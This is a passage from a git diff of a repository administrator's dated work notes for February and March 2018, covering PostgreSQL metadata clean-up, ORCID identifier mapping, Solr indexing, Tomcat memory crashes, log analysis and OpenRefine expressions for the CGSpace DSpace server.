  • I don’t know if the user accidentally entered this as their name or if that’s how ORCID behaves when the name is private?
  • +
  • I will remove that one from our list for now
  • +
  • Remove Dryland Systems subject from submission form because that CRP closed two years ago (#355)
  • +
  • Run all system updates on DSpace Test
  • +
  • Email ICT to ask how to proceed with the OCS proforma issue for the new DSpace Test server on Linode
  • +
  • Thinking about how to preserve ORCID identifiers attached to existing items in CGSpace
  • +
  • We have over 60,000 unique author + authority combinations on CGSpace:
  • +
+
dspace=# select count(distinct (text_value, authority)) from metadatavalue where resource_type_id=2 and metadata_field_id=3;
+ count 
+-------
+ 62464
+(1 row)
+
    +
  • I know from earlier this month that there are only 624 unique ORCID identifiers in the Solr authority core, so it’s way easier to just fetch the unique ORCID iDs from Solr and then go back to PostgreSQL and do the metadata mapping that way
  • +
  • The query in Solr would simply be orcid_id:* (a quick sketch is below)
  • +
  • Assuming I know that authority record with id:d7ef744b-bbd4-4171-b449-00e37e1b776f, then I could query PostgreSQL for all metadata records using that authority:
  • +
+
dspace=# select * from metadatavalue where resource_type_id=2 and authority='d7ef744b-bbd4-4171-b449-00e37e1b776f';
+ metadata_value_id | resource_id | metadata_field_id |        text_value         | text_lang | place |              authority               | confidence | resource_type_id 
+-------------------+-------------+-------------------+---------------------------+-----------+-------+--------------------------------------+------------+------------------
+           2726830 |       77710 |                 3 | Rodríguez Chalarca, Jairo |           |     2 | d7ef744b-bbd4-4171-b449-00e37e1b776f |        600 |                2
+(1 row)
+
    +
  • Then I suppose I can use the resource_id to identify the item?
  • +
  • Actually, resource_id is the same id we use in CSV, so I could simply build something like this for a metadata import!
  • +
+
id,cg.creator.id
+93848,Alan S. Orth: 0000-0002-1735-7458||Peter G. Ballantyne: 0000-0001-9346-2893
+
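  • As for the Solr query mentioned above, listing the unique ORCID iDs from the authority core could be as simple as this (the core name and port are assumptions based on how I normally call Solr):
$ curl -s 'http://localhost:8081/solr/authority/select?q=orcid_id:*&fl=id,orcid_id&wt=csv&rows=10000'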
    +
  • I just discovered that requests-cache can transparently cache HTTP requests
  • +
  • Running resolve-orcids.py with my test input takes 10.5 seconds the first time, and then 3.0 seconds the second time!
  • +
+
$ time ./resolve-orcids.py -i orcid-test-values.txt -o /tmp/orcid-names
+Ali Ramadhan: 0000-0001-5019-1368
+Alan S. Orth: 0000-0002-1735-7458
+Ibrahim Mohammed: 0000-0001-5199-5528
+Nor Azwadi: 0000-0001-9634-1958
+./resolve-orcids.py -i orcid-test-values.txt -o /tmp/orcid-names  0.32s user 0.07s system 3% cpu 10.530 total
+$ time ./resolve-orcids.py -i orcid-test-values.txt -o /tmp/orcid-names
+Ali Ramadhan: 0000-0001-5019-1368
+Alan S. Orth: 0000-0002-1735-7458
+Ibrahim Mohammed: 0000-0001-5199-5528
+Nor Azwadi: 0000-0001-9634-1958
+./resolve-orcids.py -i orcid-test-values.txt -o /tmp/orcid-names  0.23s user 0.05s system 8% cpu 3.046 total
+

2018-02-26

+
    +
  • Peter is having problems with “Socket closed” on his submissions page again
  • +
  • He says his personal account loads much faster than his CGIAR account, which could be because the CGIAR account has potentially thousands of submissions over the last few years
  • +
  • I don’t know why it would take so long, but this logic kinda makes sense
  • +
  • I think I should increase the removeAbandonedTimeout from 90 to something like 180 and continue observing
  • +
  • I also reduced the timeout for the API pool back to 60 because those interfaces are only used by bots
  • +
+

2018-02-27

+
    +
  • Peter is still having problems with “Socket closed” on his submissions page
  • +
  • I have disabled removeAbandoned for now because that’s the only thing I changed in the last few weeks since he started having issues
  • +
  • I think the real line of logic to follow here is why the submissions page is so slow for him (presumably because of loading all his submissions?)
  • +
  • I need to see which SQL queries are run during that time
  • +
  • And only a few hours after I disabled the removeAbandoned thing CGSpace went down and lo and behold, there were 264 connections, most of which were idle:
  • +
+
$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
+      5 dspaceApi
+    279 dspaceWeb
+$ psql -c 'select * from pg_stat_activity' | grep dspaceWeb | grep -c "idle in transaction"
+218
+
    +
  • So I’m re-enabling the removeAbandoned setting
  • +
  • I grabbed a snapshot of the active connections in pg_stat_activity for all queries running longer than 2 minutes:
  • +
+
dspace=# \copy (SELECT now() - query_start as "runtime", application_name, usename, datname, waiting, state, query
+  FROM  pg_stat_activity
+  WHERE now() - query_start > '2 minutes'::interval
+ ORDER BY runtime DESC) to /tmp/2018-02-27-postgresql.txt
+COPY 263
+
    +
  • 100 of these idle in transaction connections are the following query:
  • +
+
SELECT * FROM resourcepolicy WHERE resource_type_id= $1 AND resource_id= $2 AND action_id= $3
+
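  • A rough way to count those in the snapshot is something like:
$ grep -c 'FROM resourcepolicy' /tmp/2018-02-27-postgresql.txt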
    +
  • … but according to the pg_locks documentation I should have done this to correlate the locks with the activity:
  • +
+
SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;
+
    +
  • Tom Desair from Atmire shared some extra JDBC pool parameters that might be useful on my thread on the dspace-tech mailing list: +
      +
    • abandonWhenPercentageFull: Only start cleaning up abandoned connections if the pool is used for more than X %.
    • +
    • jdbcInterceptors=‘ResetAbandonedTimer’: Make sure the “abandoned” timer is reset every time there is activity on a connection
    • +
    +
  • +
  • I will try with abandonWhenPercentageFull='50'
  • +
  • Also there are some indexes proposed in DS-3636 that he urged me to try
  • +
  • Finally finished the orcid-authority-to-item.py script!
  • +
  • It successfully mapped 2600 ORCID identifiers to items in my tests
  • +
  • I will run it on DSpace Test
  • +
+

2018-02-28

+
    +
  • CGSpace crashed today, the first HTTP 499 in nginx’s access.log was around 09:12
  • +
  • There’s nothing interesting going on in nginx’s logs around that time:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "28/Feb/2018:09:" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+     65 197.210.168.174
+     74 213.55.99.121
+     74 66.249.66.90
+     86 41.204.190.40
+    102 130.225.98.207
+    108 192.0.89.192
+    112 157.55.39.218
+    129 207.46.13.21
+    131 207.46.13.115
+    135 207.46.13.101
+
    +
  • Looking in dspace.log-2018-02-28 I see this, though:
  • +
+
2018-02-28 09:19:29,692 ERROR org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter @ Serious Error Occurred Processing Request!
+org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.lang.OutOfMemoryError: Java heap space
+
    +
  • Memory issues seem to be common this month:
  • +
+
$ grep -c 'nested exception is java.lang.OutOfMemoryError: Java heap space' dspace.log.2018-02-* 
+dspace.log.2018-02-01:0
+dspace.log.2018-02-02:0
+dspace.log.2018-02-03:0
+dspace.log.2018-02-04:0
+dspace.log.2018-02-05:0
+dspace.log.2018-02-06:0
+dspace.log.2018-02-07:0
+dspace.log.2018-02-08:0
+dspace.log.2018-02-09:0
+dspace.log.2018-02-10:0
+dspace.log.2018-02-11:0
+dspace.log.2018-02-12:0
+dspace.log.2018-02-13:0
+dspace.log.2018-02-14:0
+dspace.log.2018-02-15:10
+dspace.log.2018-02-16:0
+dspace.log.2018-02-17:0
+dspace.log.2018-02-18:0
+dspace.log.2018-02-19:0
+dspace.log.2018-02-20:0
+dspace.log.2018-02-21:0
+dspace.log.2018-02-22:0
+dspace.log.2018-02-23:0
+dspace.log.2018-02-24:0
+dspace.log.2018-02-25:0
+dspace.log.2018-02-26:0
+dspace.log.2018-02-27:6
+dspace.log.2018-02-28:1
+
    +
  • Top ten users by session during the first twenty minutes of 9AM:
  • +
+
$ grep -E '2018-02-28 09:(0|1)' dspace.log.2018-02-28 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq -c | sort -n | tail -n 10
+     18 session_id=F2DFF64D3D707CD66AE3A873CEC80C49
+     19 session_id=92E61C64A79F0812BE62A3882DA8F4BA
+     21 session_id=57417F5CB2F9E3871E609CEEBF4E001F
+     25 session_id=C3CD265AB7AA51A49606C57C069A902A
+     26 session_id=E395549F081BA3D7A80F174AE6528750
+     26 session_id=FEE38CF9760E787754E4480069F11CEC
+     33 session_id=C45C2359AE5CD115FABE997179E35257
+     38 session_id=1E9834E918A550C5CD480076BC1B73A4
+     40 session_id=8100883DAD00666A655AE8EC571C95AE
+     66 session_id=01D9932D6E85E90C2BA9FF5563A76D03
+
    +
  • According to the log 01D9932D6E85E90C2BA9FF5563A76D03 is an ILRI editor, doing lots of updating and editing of items
  • +
  • 8100883DAD00666A655AE8EC571C95AE is some Indian IP address
  • +
  • 1E9834E918A550C5CD480076BC1B73A4 looks to be a session shared by the bots
  • +
  • So maybe it was due to the editor’s uploading of files, perhaps one that was too big or something like that?
  • +
  • I think I’ll increase the JVM heap size on CGSpace from 6144m to 8192m because I’m sick of this random crashing shit, the server has memory to spare, and I’d rather eliminate this variable so I can get back to solving PostgreSQL issues and doing other real work
  • +
  • Run the few corrections from earlier this month for sponsor on CGSpace:
  • +
+
cgspace=# update metadatavalue set text_value='United States Agency for International Development' where resource_type_id=2 and metadata_field_id=29 and text_value like '%U.S. Agency for International Development%';
+UPDATE 3
+
    +
  • I finally got a CGIAR account so I logged into CGSpace with it and tried to delete my old unfinished submissions (22 of them)
  • +
  • Eventually it succeeded, but it took about five minutes and I noticed LOTS of locks happening with this query:
  • +
+
dspace=# \copy (SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid) to /tmp/locks-aorth.txt;
+
    +
  • I took a few snapshots during the process and noticed 500, 800, and even 2000 locks at certain times during the process
  • +
  • Afterwards I looked a few times and saw only 150 or 200 locks
  • +
  • On the test server, with the PostgreSQL indexes from DS-3636 applied, it finished instantly
  • +
  • Run system updates on DSpace Test and reboot the server
  • +
+ + + + + +
+ + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/2018-03/index.html b/docs/2018-03/index.html new file mode 100644 index 000000000..bbeaa3e10 --- /dev/null +++ b/docs/2018-03/index.html @@ -0,0 +1,639 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + March, 2018 | CGSpace Notes + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + +
+
+

March, 2018

+ +
+

2018-03-02

+
    +
  • Export a CSV of the IITA community metadata for Martin Mueller
  • +
+

2018-03-06

+
    +
  • Add three new CCAFS project tags to input-forms.xml (#357)
  • +
  • Andrea from Macaroni Bros had sent me an email that CCAFS needs them
  • +
  • Give Udana more feedback on his WLE records from last month
  • +
  • There were some records using a non-breaking space in their AGROVOC subject field
  • +
  • I checked and tested some author corrections from Peter from last week, and then applied them on CGSpace
  • +
+
$ ./fix-metadata-values.py -i Correct-309-authors-2018-03-06.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3      
+$ ./delete-metadata-values.py -i Delete-3-Authors-2018-03-06.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3
+
    +
  • This time there were no errors in whitespace but I did have to correct one incorrectly encoded accent character
  • +
  • Add new CRP subject “GRAIN LEGUMES AND DRYLAND CEREALS” to input-forms.xml (#358)
  • +
  • Merge the ORCID integration stuff in to 5_x-prod for deployment on CGSpace soon (#359)
  • +
  • Deploy ORCID changes on CGSpace (linode18), run all system updates, and reboot the server
  • +
  • Run all system updates on DSpace Test and reboot server
  • +
  • I ran the orcid-authority-to-item.py script on CGSpace and mapped 2,864 ORCID identifiers from Solr to item metadata
  • +
+
$ ./orcid-authority-to-item.py -db dspace -u dspace -p 'fuuu' -s http://localhost:8081/solr -d
+
    +
  • I ran the DSpace cleanup script on CGSpace and it threw an error (as always):
  • +
+
Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
+  Detail: Key (bitstream_id)=(150659) is still referenced from table "bundle".
+
    +
  • The solution is, as always:
  • +
+
$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (150659);'
+UPDATE 1
+
    +
  • Apply the proposed PostgreSQL indexes from DS-3636 (pull request #1791) on CGSpace (linode18)
  • +
+

2018-03-07

+
    +
  • Add CIAT author Mauricio Efren Sotelo Cabrera to controlled vocabulary for ORCID identifiers (#360)
  • +
  • Help Sisay proof 200 IITA records on DSpace Test
  • +
  • Finally import Udana’s 24 items to IWMI Journal Articles on CGSpace
  • +
  • Skype with James Stapleton to discuss CGSpace, ILRI website, CKM staff issues, etc
  • +
+

2018-03-08

+
    +
  • Looking at a CSV dump of the CIAT community I see there are tons of stupid text languages people add for their metadata
  • +
  • This makes the CSV have tons of columns, for example dc.title, dc.title[], dc.title[en], dc.title[eng], dc.title[en_US] and so on!
  • +
  • I think I can fix — or at least normalize — them in the database:
  • +
+
dspace=# select distinct text_lang from metadatavalue where resource_type_id=2;
+ text_lang 
+-----------
+ 
+ ethnob
+ en
+ spa
+ EN
+ En
+ en_
+ en_US
+ E.
+ 
+ EN_US
+ en_U
+ eng
+ fr
+ es_ES
+ es
+(16 rows)
+
+dspace=# update metadatavalue set text_lang='en_US' where resource_type_id=2 and text_lang in ('en','EN','En','en_','EN_US','en_U','eng');
+UPDATE 122227
+dspacetest=# select distinct text_lang from metadatavalue where resource_type_id=2;
+ text_lang
+-----------
+
+ ethnob
+ en_US
+ spa
+ E.
+
+ fr
+ es_ES
+ es
+(9 rows)
+
    +
  • On second inspection it looks like dc.description.provenance fields use the text_lang “en” so that’s probably why there are over 100,000 fields changed…
  • +
  • If I skip that, there are about 2,000, which seems more reasonable, roughly the number of fields users have edited manually or fucked up during CSV import, etc:
  • +
+
dspace=# update metadatavalue set text_lang='en_US' where resource_type_id=2 and text_lang in ('EN','En','en_','EN_US','en_U','eng');
+UPDATE 2309
+
    +
  • I will apply this on CGSpace right now
  • +
  • In other news, I was playing with adding ORCID identifiers to a dump of CIAT’s community via CSV in OpenRefine
  • +
  • Using a series of filters, flags, and GREL expressions to isolate items for a certain author, I figured out how to add ORCID identifiers to the cg.creator.id field
  • +
  • For example, a GREL expression in a custom text facet to get all items with dc.contributor.author[en_US] of a certain author with several name variations (this is how you use a logical OR in OpenRefine):
  • +
+
or(value.contains('Ceballos, Hern'), value.contains('Hernández Ceballos'))
+
    +
  • Then you can flag or star matching items and then use a conditional to either set the value directly or add it to an existing value:
  • +
+
if(isBlank(value), "Hernan Ceballos: 0000-0002-8744-7918", value + "||Hernan Ceballos: 0000-0002-8744-7918")
+
    +
  • One thing that bothers me is that this won’t honor author order
  • +
  • It might be better to do batches of these in PostgreSQL with a script that takes the place column of an author into account when setting the cg.creator.id
  • +
  • I wrote a Python script to read the author names and ORCID identifiers from CSV and create matching cg.creator.id fields: add-orcid-identifiers-csv.py
  • +
  • The CSV should have two columns: author name and ORCID identifier:
  • +
+
dc.contributor.author,cg.creator.id
+"Orth, Alan",Alan S. Orth: 0000-0002-1735-7458
+"Orth, A.",Alan S. Orth: 0000-0002-1735-7458
+
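  • A run against CGSpace then looks something like this (the CSV path here is just an example):
$ ./add-orcid-identifiers-csv.py -i /tmp/2018-03-08-orcids.csv -db dspace -u dspace -p 'fuuu'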
    +
  • I didn’t integrate the ORCID API lookup for author names in this script for now because I was only interested in “tagging” old items for a few given authors
  • +
  • I added ORCID identifiers for 187 items by CIAT’s Hernan Ceballos, because that is what Elizabeth was trying to do manually!
  • +
  • Also, I decided to add ORCID identifiers for all records from Peter, Abenet, and Sisay as well
  • +
+

2018-03-09

+
    +
  • Give James Stapleton input on Sisay’s KRAs
  • +
  • Create a pull request to disable ORCID authority integration for dc.contributor.author in the submission forms and XMLUI display (#363)
  • +
+

2018-03-11

+
    +
  • Peter also wrote to say he is having issues with the Atmire Listings and Reports module
  • +
  • When I logged in to try it I get a blank white page after continuing and I see this in dspace.log.2018-03-11:
  • +
+
2018-03-11 11:38:15,592 WARN  org.dspace.app.webui.servlet.InternalErrorServlet @ :session_id=91C2C0C59669B33A7683570F6010603A:internal_error:-- URL Was: https://cgspace.cgiar.or
+g/jspui/listings-and-reports
+-- Method: POST
+-- Parameters were:
+-- selected_admin_preset: "ilri authors2"
+-- load: "normal"
+-- next: "NEXT STEP >>"
+-- step: "1"
+
+org.apache.jasper.JasperException: java.lang.NullPointerException
+
    +
  • Looks like I needed to remove the Humidtropics subject from Listings and Reports because it was looking for the terms and couldn’t find them
  • +
  • I made a quick fix and it’s working now (#364)
  • +
+

2018-03-12

+
    +
  • Increase upload size on CGSpace’s nginx config to 85MB so Sisay can upload some data
  • +
+

2018-03-13

+
    +
  • I created a new Linode server for DSpace Test (linode6623840) so I could try the block storage stuff, but when I went to add a 300GB volume it said that block storage capacity was exceeded in that datacenter (Newark, NJ)
  • +
  • I deleted the Linode and created another one (linode6624164) in the Fremont, CA region
  • +
  • After that I deployed the Ubuntu 16.04 image and attached a 300GB block storage volume to the new Linode
  • +
  • Magdalena wrote to ask why there was no Altmetric donut for an item on CGSpace, but there was one on the related CCAFS publication page
  • +
  • It looks like the CCAFS publications page fetches the donut using its DOI, whereas CGSpace queries via Handle (a quick API check is sketched at the end of this list)
  • +
  • I will write to Altmetric support and ask them, as perhaps it’s part of a larger issue
  • +
  • CGSpace item: https://cgspace.cgiar.org/handle/10568/89643
  • +
  • CCAFS publication page: https://ccafs.cgiar.org/publications/can-scenario-planning-catalyse-transformational-change-evaluating-climate-change-policy
  • +
  • Peter tweeted the Handle link and now Altmetric shows the donut for both the DOI and the Handle
  • +
+
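  • A quick way to compare would be to ask the Altmetric details API for the Handle directly (I’m writing this endpoint from memory, so treat it as an assumption):
$ curl -s 'https://api.altmetric.com/v1/handle/10568/89643'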

2018-03-14

+
    +
  • Help Abenet with a troublesome Listings and Report question for CIAT author Steve Beebe
  • +
  • Continue migrating DSpace Test to the new server (linode6624164)
  • +
  • I emailed ILRI service desk to update the DNS records for dspacetest.cgiar.org
  • +
  • Abenet was having problems saving Listings and Reports configurations or layouts but I tested it and it works
  • +
+

2018-03-15

+
    +
  • Help Abenet troubleshoot the Listings and Reports issue again
  • +
  • It looks like it’s an issue with the layouts, if you create a new layout that only has one type (dc.identifier.citation):
  • +
+

Listing and Reports layout

+
    +
  • The error in the DSpace log is:
  • +
+
org.apache.jasper.JasperException: java.lang.ArrayIndexOutOfBoundsException: -1
+
+

2018-03-16

+
    +
  • ICT made the DNS updates for dspacetest.cgiar.org late last night
  • +
  • I have removed the old server (linode02 aka linode578611) in favor of linode19 aka linode6624164
  • +
  • Looking at the CRP subjects on CGSpace I see there is one blank one so I’ll just fix it:
  • +
+
dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=230 and text_value='';
+
    +
  • Copy all CRP subjects to a CSV to do the mass updates:
  • +
+
dspace=# \copy (select distinct text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=230 group by text_value order by count desc) to /tmp/crps.csv with csv header;
+COPY 21
+
    +
  • Once I prepare the new input forms (#362) I will need to do the batch corrections:
  • +
+
$ ./fix-metadata-values.py -i Correct-21-CRPs-2018-03-16.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.crp -t correct -m 230 -n -d
+
    +
  • Create a pull request to update the input forms for the new CRP subject style (#366)
  • +
+

2018-03-19

+
    +
  • Tezira has been having problems accessing CGSpace from the ILRI Nairobi campus since last week
  • +
  • She is getting an HTTPS error apparently
  • +
  • It’s working from outside the campus, and Ethiopian users seem to be having no issues, so I’ve asked ICT to have a look
  • +
  • CGSpace crashed this morning for about seven minutes and Dani restarted Tomcat
  • +
  • Around that time there were an increase of SQL errors:
  • +
+
2018-03-19 09:10:54,856 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
+...
+2018-03-19 09:10:54,862 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL query singleTable Error -
+
    +
  • But I don’t even know what these errors mean, because a handful of them happen every day:
  • +
+
$ grep -c 'ERROR org.dspace.storage.rdbms.DatabaseManager' dspace.log.2018-03-1*
+dspace.log.2018-03-10:13
+dspace.log.2018-03-11:15
+dspace.log.2018-03-12:13
+dspace.log.2018-03-13:13
+dspace.log.2018-03-14:14
+dspace.log.2018-03-15:13
+dspace.log.2018-03-16:13
+dspace.log.2018-03-17:13
+dspace.log.2018-03-18:15
+dspace.log.2018-03-19:90
+
    +
  • There wasn’t even a lot of traffic at the time (8–9 AM):
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "19/Mar/2018:0[89]:" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+     92 40.77.167.197
+     92 83.103.94.48
+     96 40.77.167.175
+    116 207.46.13.178
+    122 66.249.66.153
+    140 95.108.181.88
+    196 213.55.99.121
+    206 197.210.168.174
+    207 104.196.152.243
+    294 54.198.169.202
+
    +
  • Well there is a hint in Tomcat’s catalina.out:
  • +
+
Mon Mar 19 09:05:28 UTC 2018 | Query:id: 92032 AND type:2
+Exception in thread "http-bio-127.0.0.1-8081-exec-280" java.lang.OutOfMemoryError: Java heap space
+
    +
  • So someone was doing something heavy somehow… my guess is content and usage stats!
  • +
  • ICT responded that they “fixed” the CGSpace connectivity issue in Nairobi without telling me the problem
  • +
  • When I asked, Robert Okal said CGNET messed up when updating the DNS for cgspace.cgiar.org last week
  • +
  • I told him that my request last week was for dspacetest.cgiar.org, not cgspace.cgiar.org!
  • +
  • So they updated the wrong fucking DNS records
  • +
  • Magdalena from CCAFS wrote to ask about one record that has a bunch of metadata missing in her Listings and Reports export
  • +
  • It appears to be this one: https://cgspace.cgiar.org/handle/10568/83473?show=full
  • +
  • The title is “Untitled” and there is some metadata but indeed the citation is missing
  • +
  • I don’t know what would cause that
  • +
+

2018-03-20

+
    +
  • DSpace Test has been down for a few hours with SQL and memory errors starting this morning:
  • +
+
2018-03-20 08:47:10,177 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
+...
+2018-03-20 08:53:11,624 ERROR org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter @ Serious Error Occurred Processing Request!
+org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.lang.OutOfMemoryError: Java heap space
+
    +
  • I have no idea why it crashed
  • +
  • I ran all system updates and rebooted it
  • +
  • Abenet told me that one of Lance Robinson’s ORCID iDs on CGSpace is incorrect
  • +
  • I will remove it from the controlled vocabulary (#367) and update any items using the old one:
  • +
+
dspace=# update metadatavalue set text_value='Lance W. Robinson: 0000-0002-5224-8644' where resource_type_id=2 and metadata_field_id=240 and text_value like '%0000-0002-6344-195X%';
+UPDATE 1
+
    +
  • Communicate with DSpace editors on Yammer about being more careful about spaces and character editing when doing manual metadata edits
  • +
  • Merge the changes to CRP names to the 5_x-prod branch and deploy on CGSpace (#363)
  • +
  • Run corrections for CRP names in the database:
  • +
+
$ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db dspace -u dspace -p 'fuuu'
+
    +
  • Run all system updates on CGSpace (linode18) and reboot the server
  • +
  • I started a full Discovery re-index on CGSpace because of the updated CRPs
  • +
  • I see this error in the DSpace log:
  • +
+
2018-03-20 19:03:14,844 ERROR com.atmire.dspace.discovery.AtmireSolrService @ No choices plugin was configured for  field "dc_contributor_author".
+java.lang.IllegalArgumentException: No choices plugin was configured for  field "dc_contributor_author".
+        at org.dspace.content.authority.ChoiceAuthorityManager.getLabel(ChoiceAuthorityManager.java:261)
+        at org.dspace.content.authority.ChoiceAuthorityManager.getLabel(ChoiceAuthorityManager.java:249)
+        at org.dspace.browse.SolrBrowseCreateDAO.additionalIndex(SolrBrowseCreateDAO.java:215)
+        at com.atmire.dspace.discovery.AtmireSolrService.buildDocument(AtmireSolrService.java:662)
+        at com.atmire.dspace.discovery.AtmireSolrService.indexContent(AtmireSolrService.java:807)
+        at com.atmire.dspace.discovery.AtmireSolrService.updateIndex(AtmireSolrService.java:876)
+        at org.dspace.discovery.SolrServiceImpl.createIndex(SolrServiceImpl.java:370)
+        at org.dspace.discovery.IndexClient.main(IndexClient.java:117)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
+
    +
  • I have to figure that one out…
  • +
+

2018-03-21

+
    +
  • Looks like the indexing gets confused because there is still data in the authority column
  • +
  • Unfortunately this causes those items to simply not be indexed, which users noticed because item counts were cut in half and old items showed up in RSS!
  • +
  • Since we’ve migrated the ORCID identifiers associated with the authority data to the cg.creator.id field we can nullify the authorities remaining in the database:
  • +
+
dspace=# UPDATE metadatavalue SET authority=NULL WHERE resource_type_id=2 AND metadata_field_id=3 AND authority IS NOT NULL;
+UPDATE 195463
+
    +
  • After this the indexing works as usual and item counts and facets are back to normal
  • +
  • Send Peter a list of all authors to correct:
  • +
+
dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv header;
+COPY 56156
+
    +
  • Afterwards we’ll want to do some batch tagging of ORCID identifiers to these names
  • +
  • CGSpace crashed again this afternoon, I’m not sure of the cause but there are a lot of SQL errors in the DSpace log:
  • +
+
2018-03-21 15:11:08,166 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error - 
+java.sql.SQLException: Connection has already been closed.
+
    +
  • I have no idea why so many connections were abandoned this afternoon:
  • +
+
# grep 'Mar 21, 2018' /var/log/tomcat7/catalina.out | grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon'
+268
+
    +
  • DSpace Test crashed again due to Java heap space, this is from the DSpace log:
  • +
+
2018-03-21 15:18:48,149 ERROR org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter @ Serious Error Occurred Processing Request!
+org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.lang.OutOfMemoryError: Java heap space
+
    +
  • And this is from the Tomcat Catalina log:
  • +
+
Mar 21, 2018 11:20:00 AM org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor run
+SEVERE: Unexpected death of background thread ContainerBackgroundProcessor[StandardEngine[Catalina]]
+java.lang.OutOfMemoryError: Java heap space
+
    +
  • But there are tons of heap space errors on DSpace Test actually:
  • +
+
# grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
+319
+
    +
  • I guess we need to give it more RAM because it now has CGSpace’s large Solr core
  • +
  • I will increase the memory from 3072m to 4096m
  • +
  • Update Ansible playbooks to use PostgreSQL JDBC driver 42.2.2
  • +
  • Deploy the new JDBC driver on DSpace Test
  • +
  • I’m also curious to see how long the dspace index-discovery -b takes on DSpace Test where the DSpace installation directory is on one of Linode’s new block storage volumes
  • +
+
$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    208m19.155s
+user    8m39.138s
+sys     2m45.135s
+
    +
  • So that’s about three times as long as it took on CGSpace this morning
  • +
  • I should also check the raw read speed with hdparm -tT /dev/sdc
  • +
  • Looking at Peter’s author corrections there are some mistakes due to Windows 1252 encoding
  • +
  • I need to find a way to filter these easily with OpenRefine
  • +
  • For example, Peter has inadvertently introduced Unicode character 0xfffd into several fields
  • +
  • I can search for Unicode values by their hex code in OpenRefine using the following GREL expression:
  • +
+
isNotNull(value.match(/.*\ufffd.*/))
+
    +
  • I need to be able to add many common characters though so that it is useful to copy and paste into a new project to find issues
  • +
+

2018-03-22

+ +

2018-03-24

+
    +
  • More work on the Ubuntu 18.04 readiness stuff for the Ansible playbooks
  • +
  • The playbook now uses the system’s Ruby and Node.js so I don’t have to manually install RVM and NVM after
  • +
+

2018-03-25

+
    +
  • Looking at Peter’s author corrections and trying to work out a way to find errors in OpenRefine easily
  • +
  • I can find all names that have acceptable characters using a GREL expression like:
  • +
+
isNotNull(value.match(/.*[a-zA-ZáÁéèïíñØøöóúü].*/))
+
    +
  • But it’s probably better to just say which characters I know for sure are not valid (like parentheses, pipe, or weird Unicode characters):
  • +
+
or(
+  isNotNull(value.match(/.*[(|)].*/)),
+  isNotNull(value.match(/.*\uFFFD.*/)),
+  isNotNull(value.match(/.*\u00A0.*/)),
+  isNotNull(value.match(/.*\u200A.*/))
+)
+
    +
  • And here’s one combined GREL expression to check for items marked as “delete” or “check” so I can flag them and export them to a separate CSV (though perhaps it’s time to add delete support to my fix-metadata-values.py script):
  • +
+
or(
+  isNotNull(value.match(/.*delete.*/i)),
+  isNotNull(value.match(/.*remove.*/i)),
+  isNotNull(value.match(/.*check.*/i))
+)
+
    +
  • +

    So I guess the routine in OpenRefine is:

    +
      +
    • Transform: trim leading/trailing whitespace
    • +
    • Transform: collapse consecutive whitespace
    • +
    • Custom text facet for items to delete/check
    • +
    • Custom text facet for illegal characters
    • +
    +
  • +
  • +

    Test the corrections and deletions locally, then run them on CGSpace:

    +
  • +
+
$ ./fix-metadata-values.py -i /tmp/Correct-2928-Authors-2018-03-21.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3
+$ ./delete-metadata-values.py -i /tmp/Delete-8-Authors-2018-03-21.csv -f dc.contributor.author -m 3 -db dspacetest -u dspace -p 'fuuu'
+
    +
  • Afterwards I started a full Discovery reindexing on both CGSpace and DSpace Test
  • +
  • CGSpace took 76m28.292s
  • +
  • DSpace Test took 194m56.048s
  • +
+

2018-03-26

+
    +
